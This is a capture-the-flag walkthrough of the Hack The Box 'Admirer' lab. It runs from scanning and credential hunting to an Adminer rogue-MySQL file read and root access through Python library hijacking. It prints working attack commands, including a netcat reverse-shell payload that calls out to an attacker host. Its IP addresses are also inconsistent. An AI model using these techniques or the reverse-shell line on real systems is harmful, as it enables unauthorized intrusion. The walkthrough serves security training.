Looking for a detailed walkthrough of the Admirer machine on Hack The Box? In this article, we take a step-by-step look at the process of identifying and exploiting vulnerabilities to achieve remote code execution (RCE). Hack The Box is a popular cybersecurity training and practice platform. The Admirer machine offers a complex challenge that requires the researcher to have the skills to gather information, analyze data, and exploit vulnerabilities.
This machine has an IP address of 10.10.10.189, which we add to /etc/hosts.
10.10.10.187 admirer.htb
First, a scan of open ports is performed. To speed up the process, instead of using nmap to scan all ports, the scan is performed using masscan. All TCP and UDP ports are analyzed via the tun0 interface at a rate of 500 packets per second.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.187 --rate=500
Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.
nmap -A admirer.htb -p80,22,21
Based on the results of the nmap scan, a further course of action is determined. FTP and SSH services that require credentials are detected on the server, as well as an Apache web server. The robots.txt file is available on the web server, which contains a single entry — the admin-dir directory. Due to the lack of additional information, the next step is to scan the directories.
For this purpose, a quick tool called gobuster is used. The parameters specify:
scan type — directories (dir);
site URL (-u);
dictionary to scan (-w);
required file extensions (-x);
number of threads (-t).
gobuster dir -t 128 -u http://admirer.htb/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt
We find two files: the first contains email addresses, and the second contains various credentials.
And among the credentials we find credits for FTP. We connect:
Consider the server.
We are downloading all the files.
There is a suspicion that this archive is a backup of the site, let’s unzip it and see what’s in it.
mkdir HTML mv html.tar.gz HTML/ cd HTML tar -xf html.tar.gz
The first file is no different from the existing one, but among the credentials there are some that we don’t have.
Attempts to use them do not yield results. You need to search for the user and pass strings in all downloaded files.
grep -R -i "user\|pass" ./
Two more passwords for the same user were discovered. All available credentials were collected.
But they didn’t get anywhere.
When trying to complete tasks that are not resolved on the site, we will receive a refusal.
Since all executable files are located in the utility-scripts directory, let’s scan it on the host, looking for php files.
gobuster dir -t 128 -u http://admirer.htb/utility-scripts/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php
We find the file admirer.php.
After searching for information, the following sources made it clear how to get an RCE. If you specify your host as the server, you can see a connection attempt.
Start the mysql service on the local host.
sudo service mysql start sudo mysql -u root
And let’s create a user for authorization.
create user ralfadmirer@'%' identified by 'ralfadmirer' create database admirerdb; grant all privileges on admirerdb.* to 'ralfadmirer';
The configuration file /etc/mysql/mariadb.conf.d/50-server.cnf is modified to allow access to the host. To do this, the bind-address line is commented out, after which the service is restarted.
sudo service mysql restart
We log in on behalf of the newly created user.
We select our database.
Next, let’s create a table.
And we will execute an SQL query to read the index.php file, where we can find the credentials (as it was in the backup).
load data local infile '../index.php' into table admirerdb.admirertable fields terminated by '\n'
Now let’s move on to our created table.
And we will find the credentials.
SSH authentication was successfully completed using this password.
Check the sudo settings.
Thus, this script can be executed as a superuser. During its analysis, a call to a Python script was detected, which is also executed with sudo privileges.
And the script itself specifies an implicit import.
Environment variables are checked, including paths to Python.
def make_archive(): import os os.system('nc 10.10.15.110 4321 -e "/bin/sh"') make_archive()
Let’s run the script.
sudo PYTHONPATH='/tmp/' /opt/scripts/admin_tasks.sh
We get a backconnect shell.
The article describes in detail the process of exploiting vulnerabilities on the Hack The Box Admirer machine. Using a sequential approach — from port scanning and searching for hidden directories to script analysis and manipulation of environment variables — it was possible to gain complete control over the system. This experience demonstrates the importance of careful study of configurations and working with access rights in the field of cybersecurity.